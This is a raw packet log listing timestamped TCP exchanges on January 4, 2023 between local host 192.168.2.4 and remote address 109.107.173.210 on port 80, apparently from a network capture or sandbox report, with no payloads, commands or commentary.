Jan 4, 2023 16:47:26.523102999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523113966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523145914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523150921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523185968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523192883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523221016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523233891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523252010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523271084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523284912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523312092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523317099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523330927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523360968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.524064064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.524116039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.524143934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.524158001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.524171114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.524200916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.524203062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.524244070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.524247885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.524291039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.526684046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526762009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526804924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526849031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526849985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.526868105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.526868105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.526894093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526910067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.526937962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526990891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.526994944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527040005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527041912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527086973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527090073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527132988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527141094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527184010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527205944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527230978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527237892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527271986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527309895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527318954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527355909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527359962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527400970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527405977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527448893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527453899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527504921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527506113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527560949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527563095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527611971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527623892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527657986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527667046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527709961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527710915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527762890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527765989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527808905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527817011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527853966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527873993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527899981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527903080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527940989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.527977943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.527983904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528012037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528023005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528031111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528074980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528078079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528125048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528132915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528170109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528170109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528220892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528224945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528268099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528285027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528314114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528322935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528366089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528414011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528422117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528458118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528460026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528506994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528506994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528559923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528563976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528609991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528609991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528659105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528661966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528706074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528709888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528759956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528760910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528805971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528811932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528853893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528856993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528907061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528908014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528949976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.528959990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.528990030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529006958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529041052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529041052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529093981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529094934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529149055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529155016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529196024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529197931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529244900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529248953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529283047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529303074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529325962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529354095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529371977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529376030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529422045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529470921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529474974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529534101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529545069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529594898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529596090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529644966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529647112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529700041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529702902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529755116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529757977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529808044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529810905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529865026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529866934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529916048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.529918909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.529962063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530008078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530016899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530056000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530061007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530102015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530105114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530138969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530148029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530179977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530184984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530215979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.530226946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.530266047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547223091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547281981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547311068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547358036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547389030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547420025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547452927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547483921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547516108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547548056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547550917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547578096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547605991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547609091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547622919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547641993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547673941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547693014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547705889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547724009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547754049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547756910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547786951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547801018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547818899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547831059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547849894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547862053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547883034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547893047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547914982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547925949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547946930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547959089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.547988892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.547991991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548019886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548038960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548051119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548063993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548083067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548096895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548115015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548127890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548151016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548163891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548182964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548213959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548229933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548260927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548450947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548484087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.548502922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548530102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.548974991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549007893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549036980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549040079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549052000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549072981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549086094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549105883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549119949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549139977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549150944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549174070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549185038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549206018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549221039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549238920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549251080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549273968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.549287081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549320936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.549987078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.550020933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.550048113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.550052881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.550065041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.550086021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.550097942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.550120115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.550132036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.550169945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557595015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557617903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557643890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557672024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557706118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557717085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557730913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557756901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557774067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557785988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557799101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557812929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557838917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557863951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557868004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557882071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557895899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557914019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557921886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557939053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557949066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557965994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.557980061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.557993889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558007956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558023930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558037043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558053017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558063984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558079958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558093071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558108091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558121920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558137894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558151960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558166027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558180094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558195114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558211088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558232069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558238983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558265924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558276892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558294058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558295965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558320045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558322906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558351040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558351994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558367014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558379889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558409929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558424950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558435917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558455944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558463097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558489084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558492899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558521032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558521986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558537960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558549881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558578968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558604956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558631897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558660030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558662891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558701992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558712006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558751106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558765888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558779001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558806896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558832884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558834076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558861017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558866024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558891058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558892965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558918953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558921099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558948040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.558950901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558967113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.558976889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.559005976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.559014082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.559032917 CET	80	49695	109.107.173.210	192.168.2.4
